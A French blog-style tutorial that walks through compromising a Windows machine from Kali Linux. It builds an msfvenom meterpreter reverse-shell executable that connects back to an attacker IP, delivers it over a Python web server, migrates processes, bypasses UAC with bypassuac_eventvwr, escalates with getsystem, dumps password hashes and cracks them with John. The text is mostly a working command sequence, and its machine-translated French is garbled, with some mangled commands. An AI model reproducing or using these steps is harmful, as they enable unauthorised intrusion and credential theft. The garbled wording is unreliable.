Piratage du système dans Kali Linux
Système de piratage avec Kali Linux. Ce tutoriel est uniquement à des fins éducatives.
Qu'est-ce que le piratage de système?
Moyen illégal d'accéder à l'ordinateur de quelqu'un qui pirate le système d'appel d'un pirate informatique pirate le système à l'aide du logiciel malveillant, de la charge utile et du virus, Certains types de piratage sont parfaitement légaux, L'une des méthodes les plus importantes utilisées par les pirates pour contourner l'authentification standard est le craquage de mot de passe .
C'est en fait la toute première étape du processus de piratage du système. un hacker doit accéder physiquement au système cible et injecter le système cible de charge utile. Essayons quelques exemples
Piratage du système Windows!
Tout d'abord, nous créons une charge utile à l'aide du framework metasploit, exécutez simplement la commande. la charge utile est la partie des données transmises qui est le message réellement prévu.
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.20.10.103 lport=4545 -f exe > hackNos.exe
Utilisations des paramètres
- -p Charge utile à utiliser
- Adresse IP de l'attaquant "lhost"
- Port de liste des attaquants "lport"
- -f Formate de sortie
- > Nom du fichier de sortie de la charge utile
et nous démarrons notre écouteur de charge utile Metasploit et chargeons le module multi handler
notre gestionnaire TCP démarre maintenant, nous démarrons tout serveur J'utilise python SimpleHTTPServer pour transférer notre système cible de charge utile.
python -m SimpleHTTPServer 80
ouvrez n'importe quel navigateur et téléchargez le système cible de la charge utile
notre téléchargement est terminé maintenant cliquez sur le bouton Ouvrir et exécutez la charge utile
Maintenant, la machine cible du shell meterpreter exécute la commande "sysinfo " qu'elle affiche à propos des informations système.
sysinfo
nous passons à l'étape suivante, vidons tous les hachages, mais d'abord, nous migrons notre charge utile avec une autre commande ps du processus en cours d'exécution est afficher toute la machine cible du processus en cours d'exécution
ps migrate 4040
et exécutez la commande getsystem pour l'accès au compte administrateur et nous faisons face à une erreur priv_elevate_system nous avons maintenant l'autorisation d'accéder au compte administrateur nous pouvons contourner l'erreur en utilisant le moudule de post-exploitation
get system background
Post exploitation
exécuter la session en arrière-plan et charger le module bypassuac_eventvwr et définir le nom de la session
use exploit/windows/local/bypassuac_eventvwr set session 1 run
et la nouvelle session meterpreter est ouverte à nouveau exécutez la commande getsystem notre commande est exécutée avec succès
getsystem hashdum
Cracking de hachage de Windows
enregistrer le hachage dans un fichier et en utilisant l'outil john, nous pouvons déchiffrer les listes de mots de hachage choisissez le chemin de vos listes de mots
cat hash.txt john --wordlists=/usr/share/wordlists/rockyou.txt --format=NT hash.txt
Partagez avec vos amis et apprenez avec nous!
Commentaires
Enregistrer un commentaire